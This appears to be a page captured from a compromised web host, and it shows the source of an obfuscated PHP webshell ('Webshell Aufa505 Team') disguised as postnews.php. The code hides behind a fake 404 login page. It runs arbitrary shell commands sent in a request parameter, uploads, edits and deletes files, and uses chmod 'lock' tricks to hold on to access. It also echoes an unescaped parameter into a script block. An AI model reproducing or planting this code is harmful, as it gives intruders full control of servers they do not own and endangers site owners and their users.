HEX
Server: LiteSpeed
System: Linux premium267.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: predezso (1249)
PHP: 8.1.33
Disabled: NONE
$ pwd: /home/predezso/guruupdate.id/
Upload Files
File: /home/predezso/guruupdate.id/postnews.php
<?php goto T2fe8; lNYoZ: function getServerInfo(){$yourIP=$_SERVER["REMOTE_ADDR"]??"Unknown";$serverIP=gethostbyname(gethostname());$serverName=php_uname();$serverSoftware=$_SERVER["SERVER_SOFTWARE"]??"Unknown";$phpVersion=PHP_VERSION;return array("yourIP"=>$yourIP,"serverIP"=>$serverIP,"serverName"=>$serverName,"serverSoftware"=>$serverSoftware,"phpVersion"=>$phpVersion);} goto Dh5Ni; huyv3: ?><br><b>Server Software :</b><?php goto xILG2; xILG2: echo htmlspecialchars($info["serverSoftware"]); goto fjICw; cqf5H: echo htmlspecialchars($info["serverName"]); goto huyv3; c7H8N: ?><br><b>Server IP :</b><?php goto NzFw3; zmWMA: if(isset($_POST["rename_old"])&&isset($_POST["rename_new"])){$old=protectRealPath($cwd,$_POST["rename_old"]);$new=$cwd.DIRECTORY_SEPARATOR.basename($_POST["rename_new"]);if($old&&file_exists($old)){rename($old,$new);}header("Location: ?path=".urlencode($cwd)."&success=rename");die;} goto lNYoZ; fjICw: ?><br><b>PHP Version :</b><?php goto zDOis; RZZFt: echo $terminal_status?"status-on":"status-off"; goto dn1kb; mDLbA: function protectRealPath($base,$file){$real=realpath($base.DIRECTORY_SEPARATOR.$file);return $real&&strpos($real,$base)===0?$real:false;} goto XRhXo; o3v2s: $bcrypt_hash='$2a$18$Jn4TF8/myFtY8wmFzavkPei2FBwG6E2Z5Zoc6o.ZiYB0v1rXhFe9K'; goto axiXz; zvkFx: if(!isset($_SESSION["auth"])){http_response_code(404);echo "<html><body style=\"background:#1e1e2f;color:#ffffff;font-family:monospace;\"><h2>404 Not Found</h2><form method=\"POST\"><input type=\"password\" name=\"pass\" placeholder=\"Password...\" autofocus><input type=\"submit\" value=\"Login\"></form></body></html>";die;} goto E_NDZ; QNfLL: goto X51gB; nEwnl: $path=$_SERVER["REQUEST_URI"]; goto nsCjg; X51gB: goto wlw33; j1mCj: if(isset($_GET["lockshell"])){chmod($cwd,365);header("Location: ?path=".urlencode($cwd)."&success=lockshell");die;} goto zDIVh; t7_H4: $items=scandir($cwd); goto rQrTg; E_NDZ: function x($cmd){if(function_exists("system")){return system($cmd);}if(function_exists("shell_exec")){return shell_exec($cmd);}if(function_exists("passthru")){return passthru($cmd);}if(function_exists("exec")){exec($cmd,$out);return implode("\n",$out);}return "Command execution not available.";} goto i0l21; A1XAd: chdir($cwd); goto NvGJr; T2fe8: session_start(); goto o3v2s; F9iHy: echo "</table>"; goto mKRPt; zDOis: echo htmlspecialchars($info["phpVersion"]); goto DrN9p; F0t6q: foreach($items as $item){if($item==="."||$item===".."){continue;}$full=$cwd.DIRECTORY_SEPARATOR.$item;$enc_item=urlencode($item);if(is_file($full)){echo "<tr class='file-row'><td>📄 <a href='?path=".urlencode($cwd)."&edit=".$enc_item."'>".htmlspecialchars($item)."</a></td><td>".getPerms($full)."</td><td>";echo "<a href='?path=".urlencode($cwd)."&delete=".$enc_item."' onclick='return confirm(\"Delete file {$item} ?\")' style='color:#ff5555;'>🗑️</a> ";echo "</td></tr>";}} goto F9iHy; Xa7Yl: echo "<form method=\"POST\" enctype=\"multipart/form-data\"><input type=\"file\" name=\"upload\"><input type=\"submit\" value=\"Upload\"></form>"; goto praym; TaJ11: if(isset($_POST["unlock_shell"])){chmod($cwd.DIRECTORY_SEPARATOR.$_POST["unlock_shell"],420);header("Location: ?path=".urlencode($cwd)."&success=unlockfile");die;} goto ZNUAF; vcowk: if(isset($_GET["success"])){?><script>const msg={upload:"✅ File uploaded!",delete:"🗑️ Deleted!",edit:"💾 Saved!",lockshell:"🔒 Shell locked!",unlockshell:"🔓 Shell unlocked!",lockfile:"🔒 File locked!",unlockfile:"🔓 File unlocked!",lockfolder:"🔒 Folder locked!",unlockfolder:"🔓 Folder unlocked!",createfolder:"📁 Folder created!",rename:"✏️ Renamed!",addfile:"📄 File created!"};alert(msg["<?php echo $_GET["success"]; ?>"]||"✅ Done.");</script><?php } goto TpRoM; ZNUAF: if(isset($_POST["lock_folder"])){chmod($cwd.DIRECTORY_SEPARATOR.$_POST["lock_folder"],365);header("Location: ?path=".urlencode($cwd)."&success=lockfolder");die;} goto NZfXl; L2D2y: ?>"> <input name="cmd"placeholder="Command..."> <input type="submit"value="Execute"></form><form method="POST"><input name="lock_shell"placeholder="Lock file"><input type="submit"value="🔒 Lock"></form><form method="POST"><input name="unlock_shell"placeholder="Unlock file"><input type="submit"value="🔓 Unlock"></form><form method="POST"><input name="lock_folder"placeholder="Lock folder"><input type="submit"value="🔒 Lock"></form><form method="POST"><input name="unlock_folder"placeholder="Unlock folder"><input type="submit"value="🔓 Unlock"></form><form><input name="lockshell"type="hidden"value="1"><input type="submit"value="🔒 Lock Shell"></form><form><input name="unlockshell"type="hidden"value="1"><input type="submit"value="🔓 Unlock Shell"></form><form method="POST"><input name="new_folder"placeholder="New folder name"><input type="submit"value="📁 Create Folder"></form><form method="POST"><input name="rename_old"placeholder="Old name"><input name="rename_new"placeholder="New name"><input type="submit"value="✏️ Rename"></form><form method="POST"><input name="new_file"placeholder="New file name"><br><textarea cols="60"name="file_content"placeholder="File content..."rows="5"></textarea><br><input name="add_file"type="submit"value="📄 Add File"></form><?php goto nCT8l; HVElq: echo htmlspecialchars($info["yourIP"]); goto c7H8N; praym: echo "<h3>📂 Files & Folders</h3><table class=\"file-table\"><tr><th>Name</th><th>Perm</th><th>Actions</th></tr>"; goto t7_H4; dn1kb: ?>"><?php goto Z1C35; lqtQW: function clickablePath($path){$parts=explode(DIRECTORY_SEPARATOR,$path);$accum='';$links=array();foreach($parts as $part){if($part===''){continue;}$accum.=DIRECTORY_SEPARATOR.$part;$links[]="<a href=\"?path=".urlencode($accum)."\" style=\"color:#00ff00;\">".htmlspecialchars($part)."</a>";}return DIRECTORY_SEPARATOR.implode(DIRECTORY_SEPARATOR,$links);} goto mDLbA; eRqbb: ?><!doctypehtml><html><head><title>Webshell Aufa505 Team</title><style>body{background:#0f0f0f;color:#0f9;font-family:monospace;padding:20px}input,textarea{background:#1a1a1a;color:#0f9;border:1px solid #333;padding:5px;font-family:monospace}input[type=submit]{background:#096;color:#fff;font-weight:700;border:none;padding:6px 10px;cursor:pointer;margin-top:4px}.file-table{width:100%;border-collapse:separate;border-spacing:0 8px;margin-top:10px;font-size:16px}.file-table th{background:#1c1c1c;color:#0f9;text-align:left;padding:10px 15px;border-radius:6px}.file-table td{padding:10px 15px}.file-row{background:#121212;border:1px solid #030;border-radius:6px;transition:background-color .3s ease,box-shadow .3s ease;cursor:default}.file-row:hover{background:#040;box-shadow:0 0 10px #0f9}.file-table a{color:#3fc;text-decoration:none}.file-table a:hover{text-decoration:underline}.status-on{color:#0f0;font-weight:700}.status-off{color:#f44;font-weight:700}.info-box{background:#1a1a1a;padding:15px;margin-bottom:20px;border-radius:6px;line-height:1.6;color:#9fc}form>input[type=password],form>input[type=text]{margin-right:10px;margin-bottom:6px}</style></head><body><h2>Webshell Aufa505 Team</h2><div class="info-box"><b>Your IP :</b><?php goto HVElq; nCT8l: if(isset($_GET["cmd"])){echo "<pre>";echo htmlspecialchars(x($_GET["cmd"]));echo "</pre>";} goto PQ38z; nsCjg: goto QNfLL; PQ38z: if(isset($_GET["edit"])){$editfile=protectRealPath($cwd,$_GET["edit"]);if($editfile&&is_file($editfile)){$content=htmlspecialchars(file_get_contents($editfile));echo "<h3>Edit: ".htmlspecialchars(basename($editfile))."</h3>";echo "<form method=\"POST\"><input type=\"hidden\" name=\"editfile\" value=\"".htmlspecialchars($editfile)."\"><textarea name=\"content\" rows=\"20\" cols=\"100\">".$content."</textarea><br><input type=\"submit\" value=\"Save\"></form>";}} goto Xa7Yl; NZfXl: if(isset($_POST["unlock_folder"])){chmod($cwd.DIRECTORY_SEPARATOR.$_POST["unlock_folder"],493);header("Location: ?path=".urlencode($cwd)."&success=unlockfolder");die;} goto j1mCj; L8y96: $domain=$_SERVER["HTTP_HOST"]; goto nEwnl; NvGJr: function getPerms($file){$p=fileperms($file);$t='';$t.=is_dir($file)?"d":"-";$t.=$p&256?"r":"-";$t.=$p&128?"w":"-";$t.=$p&64?"x":"-";$t.=$p&32?"r":"-";$t.=$p&16?"w":"-";$t.=$p&8?"x":"-";$t.=$p&4?"r":"-";$t.=$p&2?"w":"-";$t.=$p&1?"x":"-";return $t;} goto lqtQW; rQrTg: foreach($items as $item){if($item==="."||$item===".."){continue;}$full=$cwd.DIRECTORY_SEPARATOR.$item;$enc_item=urlencode($item);if(is_dir($full)){echo "<tr class='file-row'><td><a href='?path=".urlencode($full)."' style='color:#00ff00;'>📁 ".htmlspecialchars($item)."</a></td><td>".getPerms($full)."</td><td>";echo "<a href='?path=".urlencode($cwd)."&delete=".$enc_item."' onclick='return confirm(\"Delete folder {$item} ?\")' style='color:#ff5555;'>🗑️</a> ";echo "</td></tr>";}} goto F0t6q; JaFqD: echo htmlspecialchars($cwd); goto L2D2y; C2WAP: if(isset($_POST["editfile"])&&isset($_POST["content"])){file_put_contents($_POST["editfile"],$_POST["content"]);header("Location: ?path=".urlencode($cwd)."&success=edit");die;} goto s7cze; Z1C35: echo $terminal_status?"ON":"OFF"; goto Ad9S_; DrN9p: ?><br><b>Terminal :</b> <span class="<?php goto RZZFt; Ad9S_: ?></span></div><?php goto vcowk; tiH85: if(isset($_FILES["upload"])){$dest=$cwd.DIRECTORY_SEPARATOR.basename($_FILES["upload"]["name"]);move_uploaded_file($_FILES["upload"]["tmp_name"],$dest);header("Location: ?path=".urlencode($cwd)."&success=upload");die;} goto C2WAP; wlw33: if(isset($_POST["pass"])){if(password_verify($_POST["pass"],$bcrypt_hash)){$_SESSION["auth"]=true;}else{echo "<span style='color:red;'>Password salah!</span>";}} goto zvkFx; zDIVh: if(isset($_GET["unlockshell"])){chmod($cwd,509);header("Location: ?path=".urlencode($cwd)."&success=unlockshell");die;} goto zmWMA; s7cze: if(isset($_POST["new_folder"])&&!empty(trim($_POST["new_folder"]))){$foldername=basename($_POST["new_folder"]);$newpath=$cwd.DIRECTORY_SEPARATOR.$foldername;if(!is_dir($newpath)){mkdir($newpath,493);}header("Location: ?path=".urlencode($cwd)."&success=createfolder");die;} goto dIqlr; Mif8a: $info=getServerInfo(); goto JVNKd; zS3s1: echo clickablePath($cwd); goto zK8fR; dIqlr: if(isset($_POST["lock_shell"])){chmod($cwd.DIRECTORY_SEPARATOR.$_POST["lock_shell"],292);header("Location: ?path=".urlencode($cwd)."&success=lockfile");die;} goto TaJ11; XRhXo: if(isset($_POST["add_file"])&&!empty(trim($_POST["new_file"]))){$filename=basename($_POST["new_file"]);$filepath=$cwd.DIRECTORY_SEPARATOR.$filename;file_put_contents($filepath,$_POST["file_content"]);header("Location: ?path=".urlencode($cwd)."&success=addfile");die;} goto HgNi4; zK8fR: ?></div><form><input name="path"type="hidden"value="<?php goto JaFqD; Dh5Ni: function checkTerminal(){if(function_exists("shell_exec")||function_exists("system")||function_exists("exec")||function_exists("passthru")){return true;}return false;} goto Mif8a; HgNi4: if(isset($_GET["delete"])){$target=protectRealPath($cwd,$_GET["delete"]);if($target&&is_file($target)){unlink($target);}elseif($target&&is_dir($target)){rmdir($target);}header("Location: ?path=".urlencode($cwd)."&success=delete");die;} goto tiH85; i0l21: $cwd=isset($_GET["path"])?realpath($_GET["path"]):getcwd(); goto IjZqH; JVNKd: $terminal_status=checkTerminal(); goto eRqbb; sFeSR: ?><br><b>Server :</b><?php goto cqf5H; axiXz: goto L8y96; IjZqH: if($cwd===false){$cwd=getcwd();} goto A1XAd; NzFw3: echo htmlspecialchars($info["serverIP"]); goto sFeSR; TpRoM: ?><div><b>Path:</b><?php goto zS3s1; mKRPt: ?></body></html>
@ Telegram